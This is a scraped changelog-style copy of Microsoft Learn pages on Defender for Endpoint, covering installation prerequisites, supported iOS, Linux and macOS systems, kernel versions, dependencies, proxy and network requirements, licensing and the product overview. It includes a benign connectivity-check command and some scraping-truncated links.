-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-**Microsoft Defender for Endpoint on iOS** offers protection against phishing and unsafe network connections from websites, emails, and apps. All alerts will be available through a single pane of glass in the Microsoft Defender portal. The portal gives security teams a centralized view of threats on iOS devices along with other platforms.
-
-> [!CAUTION]
-> Running other third-party endpoint protection products alongside Defender for Endpoint on iOS is likely to cause performance problems and unpredictable system errors.
-
-## Prerequisites
-
-### For End Users
--- Microsoft Defender for Endpoint license assigned to the end user(s) of the app. See [Microsoft Defender for Endpoint licensing requirements](/microsoft-365/security/defender-endpoint/minimum-requirements#licensing-requirements).--- **For enrolled devices**:
- - Device(s) are [enrolled](/mem/intune/user-help/enroll-your-device-in-intune-ios) via the Intune Company Portal app to enforce Intune device compliance policies. This requires the end user to be assigned a Microsoft Intune license.
- - Intune Company Portal app can be downloaded from the [Apple App Store](https://apps.apple.com/us/app/intune-company-portal/id719171358).
-
- > [!NOTE]
- > Apple does not allow redirecting users to download other apps from the app store so this step needs to be done by the user before onboarding to Microsoft Defender for Endpoint app.
-
- - Device(s) are registered with Microsoft Entra ID. This requires the end user to be signed in through [Microsoft Authenticator app](https://apps.apple.com/app/microsoft-authenticator/id983156458).
--- **For unenrolled devices**: Device(s) are registered with Microsoft Entra ID. This requires the end user to be signed in through [Microsoft Authenticator app](https://apps.apple.com/app/microsoft-authenticator/id983156458).--- For more information on how to assign licenses, see [Assign licenses to users](/azure/active-directory/users-groups-roles/licensing-groups-assign).-
-### For Administrators
--- Access to the Microsoft Defender portal.--- Access to the [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431), to:
- - Deploy the app to enrolled user groups in your organization.
- - Configure Microsoft Defender for Endpoint risk signals in app protection policy (MAM)
-
- > [!NOTE]
- >
- > - Microsoft Defender for Endpoint now extends protection to an organization's data within a managed application for those who aren't using mobile device management (MDM) but are using Intune to manage mobile applications. It also extends this support to customers who use other enterprise mobility management solutions, while still using Intune for [mobile application management (MAM)](/mem/intune/apps/mam-faq).
- > - In addition, Microsoft Defender for Endpoint already supports devices that are enrolled using Intune mobile device management (MDM).
-
-### System Requirements
--- iOS device running iOS 15.0 and above. iPads are also supported.--- The device is either enrolled with the [Intune Company Portal app](https://apps.apple.com/us/app/intune-company-portal/id719171358) or is registered with Microsoft Entra ID through [Microsoft Authenticator](https://apps.apple.com/app/microsoft-authenticator/id983156458) with the same account.-
-> [!NOTE]
->
-> - Microsoft Defender for Endpoint on iOS isn't supported on user-less or shared devices.
-> - Microsoft Defender for Endpoint on iOS isn't supported currently while using iOS User Enrollment.
-
-## Installation instructions
-
-Deployment of Microsoft Defender for Endpoint on iOS can be done via Microsoft Intune and both supervised and unsupervised devices are supported. End-users can also directly install the app from the [Apple app store](https://aka.ms/mdatpiosappstore).
--- For information on deploying on enrolled devices through Microsoft Configuration Manager or Intune, see [Deploy Microsoft Defender for Endpoint on iOS](ios-install.md).-- For information on using Defender for Endpoint in app protection policy (MAM), see [Configure app protection policy to include Defender for Endpoint risk signals (MAM)](ios-install-unmanaged.md)-
-## Resources
--- Stay informed about upcoming releases by visiting [What's new in Microsoft Defender for Endpoint on iOS](ios-whatsnew.md) or our [blog](https://techcommunity.microsoft.com/t5/microsoft-defender-atp/bg-p/MicrosoftDefenderATPBlog/label-name/iOS).--- Provide feedback through in-app feedback system or through the [unified security console](https://security.microsoft.com)-
-## Next steps
--- [Deploy Microsoft Defender for Endpoint on iOS through Intune for enrolled devices](ios-install.md)-- [Configure app protection policy to include Defender for Endpoint risk signals (MAM)](ios-install-unmanaged.md)-- [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)-- [Configure Conditional Access policy based on device risk score from Microsoft Defender for Endpoint](ios-configure-features.md#conditional-access-with-defender-for-endpoint-on-ios)-- [Mobile Application Management (MAM) basics](/mem/intune/apps/app-management#mobile-application-management-mam-basics)
security Microsoft Defender Endpoint Linux https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-linux.md
- Title: Microsoft Defender for Endpoint on Linux-
-description: Describes how to install and use Microsoft Defender for Endpoint on Linux.
------- m365-security-- tier3-- mde-linux-- Previously updated : 11/29/2023--
-# Microsoft Defender for Endpoint on Linux
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-This article describes how to install, configure, update, and use Microsoft Defender for Endpoint on Linux.
-
-> [!CAUTION]
-> Running other third-party endpoint protection products alongside Microsoft Defender for Endpoint on Linux is likely to lead to performance problems and unpredictable side effects. If non-Microsoft endpoint protection is an absolute requirement in your environment, you can still safely take advantage of Defender for Endpoint on Linux EDR functionality after configuring the antivirus functionality to run in [Passive mode](linux-preferences.md#enforcement-level-for-antivirus-engine).
-
-## How to install Microsoft Defender for Endpoint on Linux
-
-Microsoft Defender for Endpoint for Linux includes anti-malware and endpoint detection and response (EDR) capabilities.
-
-### Prerequisites
--- Access to the Microsoft Defender portal-- Linux distribution using the [systemd](https://systemd.io/) system manager-
- > [!NOTE]
- > Linux distribution using system manager, except for RHEL/CentOS 6.x support both SystemV and Upstart.
--- Beginner-level experience in Linux and BASH scripting-- Administrative privileges on the device (in case of manual deployment)-
-> [!NOTE]
-> Microsoft Defender for Endpoint on Linux agent is independent from [OMS agent](/azure/azure-monitor/agents/agents-overview#log-analytics-agent). Microsoft Defender for Endpoint relies on its own independent telemetry pipeline.
-
-### Installation instructions
-
-There are several methods and deployment tools that you can use to install and configure Microsoft Defender for Endpoint on Linux.
-
-In general you need to take the following steps:
--- Ensure that you have a Microsoft Defender for Endpoint subscription.-- Deploy Microsoft Defender for Endpoint on Linux using one of the following deployment methods:
- - The command-line tool:
- - [Manual deployment](linux-install-manually.md)
- - Third-party management tools:
- - [Deploy using Puppet configuration management tool](linux-install-with-puppet.md)
- - [Deploy using Ansible configuration management tool](linux-install-with-ansible.md)
- - [Deploy using Chef configuration management tool](linux-deploy-defender-for-endpoint-with-chef.md)
- - [Deploy using Saltstack configuration management tool](linux-install-with-saltack.md)
- If you experience any installation failures, refer to [Troubleshooting installation failures in Microsoft Defender for Endpoint on Linux](linux-support-install.md).
-
-> [!NOTE]
-> It is not supported to install Microsoft Defender for Endpoint in any other location other than the default install path.
->
-> Microsoft Defender for Endpoint on Linux creates an "mdatp" user with random UID and GID. If you want to control the UID and GID, create an "mdatp" user prior to installation using the "/usr/sbin/nologin" shell option.
-> For example: `mdatp:x:UID:GID::/home/mdatp:/usr/sbin/nologin`.
-
-### System requirements
--- Supported Linux server distributions and x64 (AMD64/EM64T) and x86_64 versions:
- - Red Hat Enterprise Linux 6.7 or higher (In preview)
- - Red Hat Enterprise Linux 7.2 or higher
- - Red Hat Enterprise Linux 8.x
- - Red Hat Enterprise Linux 9.x
- - CentOS 6.7 or higher (In preview)
- - CentOS 7.2 or higher
- - Ubuntu 16.04 LTS or higher LTS
- - Debian 9 - 12
- - SUSE Linux Enterprise Server 12 or higher
- - SUSE Linux Enterprise Server 15 or higher
- - Oracle Linux 7.2 or higher
- - Oracle Linux 8.x
- - Oracle Linux 9.x
- - Amazon Linux 2
- - Amazon Linux 2023
- - Fedora 33 or higher
- - Rocky 8.7 and higher
- - Alma 8.4 and higher
- - Mariner 2
-
- > [!NOTE]
- > Distributions and version that are not explicitly listed are unsupported (even if they are derived from the officially supported distributions).
- > With RHEL 6 support for 'extended end of life' coming to an end by June 30, 2024; MDE Linux support for RHEL 6 will also be deprecated by June 30, 2024
- > MDE Linux version 101.23082.0011 is the last MDE Linux release supporting RHEL 6.7 or higher versions (does not expire before June 30, 2024). Customers are advised to plan upgrades to their RHEL 6 infrastructure aligned with guidance from Red Hat.
--- List of supported kernel versions
- > [!NOTE]
- > Microsoft Defender for Endpoint on Red Hat Enterprise Linux and CentOS - 6.7 to 6.10 is a Kernel based solution. You must verify that the kernel version is supported before updating to a newer kernel version.
- > Microsoft Defender for Endpoint for all other supported distributions and versions is kernel-version-agnostic. With a minimal requirement for the kernel version to be at or greater than 3.10.0-327.
-
- - The `fanotify` kernel option must be enabled
- - Red Hat Enterprise Linux 6 and CentOS 6:
- - For 6.7: 2.6.32-573.* (except 2.6.32-573.el6.x86_64)
- - For 6.8: 2.6.32-642.*
- - For 6.9: 2.6.32-696.* (except 2.6.32-696.el6.x86_64)
- - For 6.10:
- - 2.6.32-754.10.1.el6.x86_64
- - 2.6.32-754.11.1.el6.x86_64
- - 2.6.32-754.12.1.el6.x86_64
- - 2.6.32-754.14.2.el6.x86_64
- - 2.6.32-754.15.3.el6.x86_64
- - 2.6.32-754.17.1.el6.x86_64
- - 2.6.32-754.18.2.el6.x86_64
- - 2.6.32-754.2.1.el6.x86_64
- - 2.6.32-754.22.1.el6.x86_64
- - 2.6.32-754.23.1.el6.x86_64
- - 2.6.32-754.24.2.el6.x86_64
- - 2.6.32-754.24.3.el6.x86_64
- - 2.6.32-754.25.1.el6.x86_64
- - 2.6.32-754.27.1.el6.x86_64
- - 2.6.32-754.28.1.el6.x86_64
- - 2.6.32-754.29.1.el6.x86_64
- - 2.6.32-754.29.2.el6.x86_64
- - 2.6.32-754.3.5.el6.x86_64
- - 2.6.32-754.30.2.el6.x86_64
- - 2.6.32-754.33.1.el6.x86_64
- - 2.6.32-754.35.1.el6.x86_64
- - 2.6.32-754.39.1.el6.x86_64
- - 2.6.32-754.41.2.el6.x86_64
- - 2.6.32-754.43.1.el6.x86_64
- - 2.6.32-754.47.1.el6.x86_64
- - 2.6.32-754.48.1.el6.x86_64
- - 2.6.32-754.49.1.el6.x86_64
- - 2.6.32-754.6.3.el6.x86_64
- - 2.6.32-754.9.1.el6.x86_64
-
- > [!NOTE]
- > After a new package version is released, support for the previous two versions is reduced to technical support only. Versions older than that which are listed in this section are provided for technical upgrade support only.
-
- > [!CAUTION]
- > Running Defender for Endpoint on Linux side by side with other `fanotify`-based security solutions is not supported. It can lead to unpredictable results, including hanging the operating system. If there are any other applications on the system that use `fanotify` in blocking mode, applications are listed in the `conflicting_applications` field of the `mdatp health` command output. The Linux **FAPolicyD** feature uses `fanotify` in blocking mode, and is therefore unsupported when running Defender for Endpoint in active mode. You can still safely take advantage of Defender for Endpoint on Linux EDR functionality after configuring the antivirus functionality Real Time Protection Enabled to [Passive mode](linux-preferences.md#enforcement-level-for-antivirus-engine).
--- Disk space: 2 GB-
- > [!NOTE]
- > An additional 2 GB disk space might be needed if cloud diagnostics are enabled for crash collections.
--- /opt/microsoft/mdatp/sbin/wdavdaemon requires executable permission. For more information, see "Ensure that the daemon has executable permission" in [Troubleshoot installation issues for Microsoft Defender for Endpoint on Linux](/microsoft-365/security/defender-endpoint/linux-support-install).--- Cores: 2 minimum, 4 preferred--- Memory: 1 GB minimum, 4 preferred-
- > [!NOTE]
- > Please make sure that you have free disk space in /var.
--- List of supported filesystems for RTP, Quick, Full and Custom Scan.
-
- |RTP, Quick, Full Scan| Custom Scan|
- |||
- |btrfs|All filesystems supported for RTP, Quick, Full Scan|
- |ecryptfs|Efs|
- |ext2|S3fs|
- |ext3|Blobfuse|
- |ext4|Lustr|
- |fuse|glustrefs|
- |fuseblk|Afs|
- |jfs|sshfs|
- |nfs (v3 only)|cifs|
- |overlay|smb|
- |ramfs|gcsfuse|
- |reiserfs|sysfs|
- |tmpfs|
- |udf|
- |vfat|
- |xfs|
--
-After you've enabled the service, you m need to configure your network or firewall to allow outbound connections between it and your endpoints.
--- Audit framework (`auditd`) must be enabled.-
- > [!NOTE]
- > System events captured by rules added to `/etc/audit/rules.d/` will add to `audit.log`(s) and might affect host auditing and upstream collection. Events added by Microsoft Defender for Endpoint on Linux will be tagged with `mdatp` key.
-
-### External package dependency
-The following external package dependencies exist for the mdatp package:
-- The mdatp RPM package requires "glibc >= 2.17", "audit", "policycoreutils", "semanage" "selinux-policy-targeted", "mde-netfilter"-- For RHEL6 the mdatp RPM package requires "audit", "policycoreutils", "libselinux", "mde-netfilter"-- For DEBIAN the mdatp package requires "libc6 >= 2.23", "uuid-runtime", "auditd", "mde-netfilter"-
-The mde-netfilter package also has the following package dependencies:
-- For DEBIAN the mde-netfilter package requires "libnetfilter-queue1", "libglib2.0-0"-- For RPM the mde-netfilter package requires "libmnl", "libnfnetlink", "libnetfilter_queue", "glib2"-
-If the Microsoft Defender for Endpoint installation fails due to missing dependencies errors, you can manually download the pre-requisite dependencies.
-
-### Configuring Exclusions
-
-When adding exclusions to Microsoft Defender Antivirus, you should be mindful of [Common Exclusion Mistakes for Microsoft Defender Antivirus](/microsoft-365/security/defender-endpoint/common-exclusion-mistakes-microsoft-defender-antivirus).
-
-### Network connections
-
-The following downloadable spreadsheet lists the services and their associated URLs that your network must be able to connect to. You should ensure that there are no firewall or network filtering rules that would deny access to these URLs. If there are, you might need to create an *allow* rule specifically for them.
-
-| Spreadsheet of domains list | Description |
-|||
-|Microsoft Defender for Endpoint URL list for commercial customers| Spreadsheet of specific DNS records for service locations, geographic locations, and OS for commercial customers. <br/><br/> [Download the spreadsheet here](https://download.microsoft.com/download/6/b/f/6bfff670-47c3-4e45-b01b-64a2610eaefa/mde-urls-commercial.xlsx). |
-| Microsoft Defender for Endpoint URL list for Gov/GCC/DoD | Spreadsheet of specific DNS records for service locations, geographic locations, and OS for Gov/GCC/DoD customers. <br/><br/> [Download the spreadsheet here](https://download.microsoft.com/download/6/e-urls-gov.xlsx). |
--
-> [!NOTE]
-> For a more specific URL list, see [Configure proxy and internet connectivity settings](/microsoft-365/security/defender-endpoint/configure-proxy-internet#enable-access-to-microsoft-defender-atp-service-urls-in-the-proxy-server).
-
-Defender for Endpoint can discover a proxy server by using the following discovery methods:
--- Transparent proxy-- Manual static proxy configuration-
-If a proxy or firewall is blocking anonymous traffic, make sure that anonymous traffic is permitted in the previously listed URLs. For transparent proxies, no additional configuration is needed for Defender for Endpoint. For static proxy, follow the steps in [Manual Static Proxy Configuration](linux-static-proxy-configuration.md).
-
-> [!WARNING]
-> PAC, WPAD, and authenticated proxies are not supported. Ensure that only a static proxy or transparent proxy is being used.
->
-> SSL inspection and intercepting proxies are also not supported for security reasons. Configure an exception for SSL inspection and your proxy server to directly pass through data from Defender for Endpoint on Linux to the relevant URLs without interception. Adding your interception certificate to the global store will not allow for interception.
-
-For troubleshooting steps, see [Troubleshoot cloud connectivity issues for Microsoft Defender for Endpoint on Linux](linux-support-connectivity.md).
-
-## How to update Microsoft Defender for Endpoint on Linux
-
-Microsoft regularly publishes software updates to improve performance, security, and to deliver new features. To update Microsoft Defender for Endpoint on Linux, refer to [Deploy updates for Microsoft Defender for Endpoint on Linux](linux-updates.md).
-
-## How to configure Microsoft Defender for Endpoint on Linux
-
-Guidance for how to configure the product in enterprise environments is available in [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md).
-
-## Common Applications to Microsoft Defender for Endpoint can impact
-
-High I/O workloads from certain applications can experience performance issues when Microsoft Defender for Endpoint is installed. These include applications for developer scenarios like Jenkins and Jira, and database workloads like OracleDB and Postgres. If experiencing performance degradation, consider setting exclusions for trusted applications, keeping [Common Exclusion Mistakes for Microsoft Defender Antivirus](/microsoft-365/security/defender-endpoint/common-exclusion-mistakes-microsoft-defender-antivirus) in mind. For additional guidance, consider consulting documentation regarding antivirus exclusions from third party applications.
-
-## Resources
--- For more information about logging, uninstalling, or other articles, see [Resources](linux-resources.md).-
-## Related articles
--- [Protect your endpoints with Defender for Cloud's integrated EDR solution: Microsoft Defender for Endpoint](/azure/defender-for-cloud/integration-defender-for-endpoint)-- [Connect your non-Azure machines to Microsoft Defender for Cloud](/azure/defender-for-cloud/quickstart-onboard-machines)-- [Turn on network protection for Linux](network-protection-linux.md)-
security Microsoft Defender Endpoint Mac https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-mac.md
- Title: Microsoft Defender for Endpoint on Mac-
-description: Learn how to install, configure, update, and use Microsoft Defender for Endpoint on Mac.
------- m365-security-- tier3-- mde-macos-- Previously updated : 01/02/2024--
-# Microsoft Defender for Endpoint on Mac
--
-**Applies to:**
-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-business)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Individuals](https://www.microsoft.com/microsoft-365/microsoft-defender-for-individuals)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-This topic describes how to install, configure, update, and use Defender for Endpoint on Mac.
-
-> [!CAUTION]
-> Running other third-party endpoint protection products alongside Microsoft Defender for Endpoint on Mac is likely to lead to performance problems and unpredictable side effects. If non-Microsoft endpoint protection is an absolute requirement in your environment, you can still safely take advantage of Defender for Endpoint on Mac EDR functionality after configuring the antivirus functionality to run in [Passive mode](mac-preferences.md#enforcement-level-for-antivirus-engine).
-
-## What's new in the latest release
-
-[What's new in Microsoft Defender for Endpoint](whats-new-in-microsoft-defender-endpoint.md)
-
-[What's new in Microsoft Defender for Endpoint on Mac](mac-whatsnew.md)
-
-> [!TIP]
-> If you have any feedback that you would like to share, submit it by opening Microsoft Defender for Endpoint on Mac on your device and navigating to **Help** \> **Send feedback**.
-
-To get the latest features, including preview capabilities (such as endpoint detection and response for your Mac devices), configure your macOS device running Microsoft Defender for Endpoint to be a Beta channel (formerly Insider-Fast) device.
-
-## How to install Microsoft Defender for Endpoint on Mac
-
-### Prerequisites
--- A Defender for Endpoint subscription and access to the Microsoft Defender portal-- Beginner-level experience in macOS and BASH scripting-- Administrative privileges on the device (in case of manual deployment)-
-### Installation instructions
-
-There are several methods and deployment tools that you can use to install and configure Defender for Endpoint on Mac.
--- Third-party management tools:
- - [Microsoft Intune-based deployment](mac-install-with-intune.md)
- - [JAMF-based deployment](mac-install-with-jamf.md)
- - [Other MDM products](mac-install-with-other-mdm.md)
--- Command-line tool:
- - [Manual deployment](mac-install-manually.md)
-
-### System requirements
-
-The three most recent major releases of macOS are supported.
-- 14 (Sonoma), 13 (Ventura), 12 (Monterey)
- > [!IMPORTANT]
- > On macOS 11 (Big Sur) and above, Microsoft Defender for Endpoint requires additional configuration profiles. If you are an existing customer upgrading from earlier versions of macOS, make sure to deploy the additional configuration profiles listed on [New configuration profiles for macOS Big Sur and newer versions of macOS](mac-sysext-policies.md).
--- Supported processors: x64 and ARM64.-- Disk space: 1GB-
-Beta versions of macOS aren't supported.
-
-After you've enabled the service, you may need to configure your network or firewall to allow outbound connections between it and your endpoints.
-
-### Licensing requirements
-
-Microsoft Defender for Endpoint on Mac requires one of the following Microsoft Volume Licensing offers:
--- Microsoft 365 E5 (M365 E5)-- Microsoft 365 E5 Security-- Microsoft 365 A5 (M365 A5)-- Windows 10 Enterprise E5-- Microsoft 365 Business Premium-- Windows 11 Enterprise E5-- Microsoft Defender for Endpoint P2-- Microsoft Defender for Endpoint P1 (which is included in [Microsoft 365 E3 (M365 E3)](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/microsoft-defender-for-endpoint-plan-1-now-included-in-m365-e3/ba-p/3060639))-
-> [!NOTE]
-> Eligible licensed users may use Microsoft Defender for Endpoint on up to five concurrent devices.
-> Microsoft Defender for Endpoint is also available for purchase from a Cloud Solution Provider (CSP). When purchased via a CSP, it does not require Microsoft Volume Licensing offers listed.
-
-### Configuring Exclusions
-
-When adding exclusions, be mindful of [common exclusion mistakes for Microsoft Defender Antivirus](/microsoft-365/security/defender-endpoint/common-exclusion-mistakes-microsoft-defender-antivirus).
-
-### Network connections
-
-The following downloadable spreadsheet lists the services and their associated URLs that your network must be able to connect to. You should ensure that there are no firewall or network filtering rules that would deny access to these URLs, or you may need to create an *allow* rule specifically for them.
--
-| Spreadsheet of domains list | Description |
-|||
-|Microsoft Defender for Endpoint URL list for commercial customers| Spreadsheet of specific DNS records for service locations, geographic locations, and OS for commercial customers. <br/><br/> [Download the spreadsheet here](https://download.microsoft.com/download/6/b/f/6bfff670-47c3-4e45-b01b-64a2610eaefa/mde-urls-commercial.xlsx). |
-| Microsoft Defender for Endpoint URL list for Gov/GCC/DoD | Spreadsheet of specific DNS records for service locations, geographic locations, and OS for Gov/GCC/DoD customers. <br/><br/> [Download the spreadsheet here](https://download.microsoft.com/download/6/e-urls-gov.xlsx). |
-
-Microsoft Defender for Endpoint can discover a proxy server by using the following discovery methods:
--- Proxy autoconfig (PAC)-- Web Proxy Autodiscovery Protocol (WPAD)-- Manual static proxy configuration-
-If a proxy or firewall is blocking anonymous traffic, make sure that anonymous traffic is permitted in the previously listed URLs.
-
-> [!WARNING]
-> Authenticated proxies are not supported. Ensure that only PAC, WPAD, or a static proxy is being used.
->
-> SSL inspection and intercepting proxies are also not supported for security reasons. Configure an exception for SSL inspection and your proxy server to directly pass through data from Microsoft Defender for Endpoint on macOS to the relevant URLs without interception. Adding your interception certificate to the global store will not allow for interception.
-
-To test that a connection isn't blocked, open <https://x.cp.wd.microsoft.com/api/report> and <https://cdn.x.cp.wd.microsoft.com/ping> in a browser.
-
-If you prefer the command line, you can also check the connection by running the following command in Terminal:
-
-```bash
-curl -w ' %{url_effective}\n' 'https://x.cp.wd.microsoft.com/api/report' 'https://cdn.x.cp.wd.microsoft.com/ping'
-```
-
-The output from this command should be similar to the following:
-
- `OK https://x.cp.wd.microsoft.com/api/report`
-
- `OK https://cdn.x.cp.wd.microsoft.com/ping`
-
-> [!CAUTION]
-> We recommend that you keep [System Integrity Protection](https://support.apple.com/HT204899) (SIP) enabled on client devices. SIP is a built-in macOS security feature that prevents low-level tampering with the OS, and is enabled by default.
-
-Once Microsoft Defender for Endpoint is installed, connectivity can be validated by running the following command in Terminal:
-
-```bash
-mdatp connectivity test
-```
-
-## How to update Microsoft Defender for Endpoint on Mac
-
-Microsoft regularly publishes software updates to improve performance, security, and to deliver new features. To update Microsoft Defender for Endpoint on Mac, a program named Microsoft AutoUpdate (MAU) is used. To learn more, see [Deploy updates for Microsoft Defender for Endpoint on Mac](mac-updates.md).
-
-## How to configure Microsoft Defender for Endpoint on Mac
-
-Guidance for how to configure the product in enterprise environments is available in [Set preferences for Microsoft Defender for Endpoint on Mac](mac-preferences.md).
-
-## macOS kernel and system extensions
-
-Starting with macOS 11 (Big Sur), Microsoft Defender for Endpoint has been fully migrated from kernel extension to system extensions.
-
-## Resources
--- For more information about logging, uninstalling, or other topics, see [Resources for Microsoft Defender for Endpoint on Mac](mac-resources.md).-- [Privacy for Microsoft Defender for Endpoint on Mac](mac-privacy.md).-- [Turn on Network protection for macOS](network-protection-macos.md)-
security Microsoft Defender Endpoint https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint.md
- Title: Microsoft Defender for Endpoint
-description: Microsoft Defender for Endpoint is an enterprise endpoint security platform that helps defend against advanced persistent threats.
------- m365-security-- tier1-- essentials-overview-- Previously updated : 01/19/2024--
-# Microsoft Defender for Endpoint
--
-**Applies to:**
--- [Microsoft Defender for Endpoint](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 1](defender-endpoint-plan-1.md)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](../defender-vulnerability-management/index.yml)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to help enterprise networks prevent, detect, investigate, and respond to advanced threats.
-
-> [!NOTE]
-> Example endpoints may include laptops, phones, tablets, PCs, access points, routers, and firewalls.
-
-> [!TIP]
-> Microsoft Defender for Endpoint is available in two plans, Defender for Endpoint Plan 1 and Plan 2. A new Microsoft Defender Vulnerability Management add-on is now available for Plan 2.
->
-> For more information on the features and capabilities included in each plan, including the new Defender Vulnerability Management add-on, see [Microsoft 365 guidance for security & compliance](/office365/servicedescriptions/microsoft-365-service-descriptions/microsoft-365-tenantlevel-services-licensing-guidance/microsoft-365-security-compliance-licensing-guidance).
-
-<p><p>
-
-Watch the following video to learn more about Defender for Endpoint:
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4wDob]
-
-Defender for Endpoint uses the following combination of technology built into Windows 10 and Microsoft's robust cloud service:
--- **Endpoint behavioral sensors**: Embedded in Windows 10, these sensors collect and process behavioral signals from the operating system and send this sensor data to your private, isolated, cloud instance of Microsoft Defender for Endpoint.--- **Cloud security analytics**: Leveraging big-data, device learning, and unique Microsoft optics across the Windows ecosystem, enterprise cloud products (such as Office 365), and online assets, behavioral signals are translated into insights, detections, and recommended responses to advanced threats.--- **Threat intelligence**: Generated by Microsoft hunters, security teams, and augmented by threat intelligence provided by partners, threat intelligence enables Defender for Endpoint to identify attacker tools, techniques, and procedures, and generate alerts when they are observed in collected sensor data.-
-<center><h2>Microsoft Defender for Endpoint</center></h2>
-<table>
-<tr>
-<td><a href="#tvm"><center><img src="medivm.png" alt="Vulnerability Management"> <br><b> Core Defender Vulnerability Management</b></center></a></td>
-<td><a href="#asr"><center><img src="media/asr-icon.png" alt="Attack surface reduction"><br><b>Attack surface reduction</b></center></a></td>
-<td><center><a href="#ngp"><img src="media/ngp-icon.png" alt="Next-generation protection"><br> <b>Next-generation protection</b></a></center></td>
-<td><center><a href="#edr"><img src="media/edr-icon.png" alt="Endpoint detection and response"><br> <b>Endpoint detection and response</b></a></center></td>
-<td><center><a href="#ai"><img src="media/air-icon.png" alt="Automated investigation and remediation"><br> <b>Automated investigation and remediation</b></a></center></td>
-<td><center><a href="#mte"><img src="media/mte-icon.png" alt="Microsoft Threat Experts"><br> <b>Microsoft Threat Experts</b></a></center></td>
-</tr>
-<tr>
-<td colspan="7">
-<a href="#apis"><center><b>Centralized configuration and administration, APIs</a></b></center></td>
-</tr>
-<tr>
-<td colspan="7"><a href="#mtp"><center><b>Microsoft Defender XDR</a></center></b></td>
-</tr>
-</table>
-<br>
-
-<p></p>
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4vnC4?rel=0]
-
-> [!TIP]
-> - Learn about the latest enhancements in Defender for Endpoint: [What's new in Microsoft Defender for Endpoint](whats-new-in-microsoft-defender-endpoint.md).
-> - Microsoft Defender for Endpoint demonstrated industry-leading optics and detection capabilities in the recent MITRE evaluation. Read: [Insights from the MITRE ATT&CK-based evaluation](https://cloudblogs.microsoft.com/microsoftsecure/2018/12/03/insights-from-the-mitre-attack-based-evaluation-of-windows-defender-atp/).
--
-> [!IMPORTANT]
-> The capabilities on non-Windows platforms may be different from the ones for Windows. For more information on what capabilities are available for non-Windows platforms, see [Microsoft Defender for Endpoint for non-Windows platforms](/microsoft-365/security/defender-endpoint/non-windows).
-
-<a name="tvm"></a>
-
-**[Core Defender Vulnerability Management](../defender-vulnerability-management/defender-vulnerability-management.md)**
-
-Built-in core vulnerability management capabilities use a modern risk-based approach to the discovery, assessment, prioritization, and remediation of endpoint vulnerabilities and misconfigurations. To further enhance your ability to assess your security posture and reduce risk, a new Defender Vulnerability Management add-on for Plan 2 is available.
-
-For more information on the different vulnerability management capabilities available to you, see [Compare Microsoft Defender Vulnerability Management offerings](../defender-vulnerability-management/defender-vulnerability-management-capabilities.md).
-
-<a name="asr"></a>
-
-**[Attack surface reduction](overview-attack-surface-reduction.md)**
-
-The attack surface reduction set of capabilities provides the first line of defense in the stack. By ensuring configuration settings are properly set and exploit mitigation techniques are applied, the capabilities resist attacks and exploitation. This set of capabilities also includes [network protection](network-protection.md) and [web protection](web-protection-overview.md), which regulate access to malicious IP addresses, domains, and URLs.
-
-<a name="ngp"></a>
-
-**[Next-generation protection](next-generation-protection.md)**
-
-To further reinforce the security perimeter of your network, Microsoft Defender for Endpoint uses next-generation protection designed to catch all types of emerging threats.
-
-<a name="edr"></a>
-
-**[Endpoint detection and response](overview-endpoint-detection-response.md)**
-
-Endpoint detection and response capabilities are put in place to detect, investigate, and respond to advanced threats that may have made it past the first two security pillars. [Advanced hunting](advanced-hunting-overview.md) provides a query-based threat-hunting tool that lets you proactively find breaches and create custom detections.
-
-<a name="ai"></a>
-
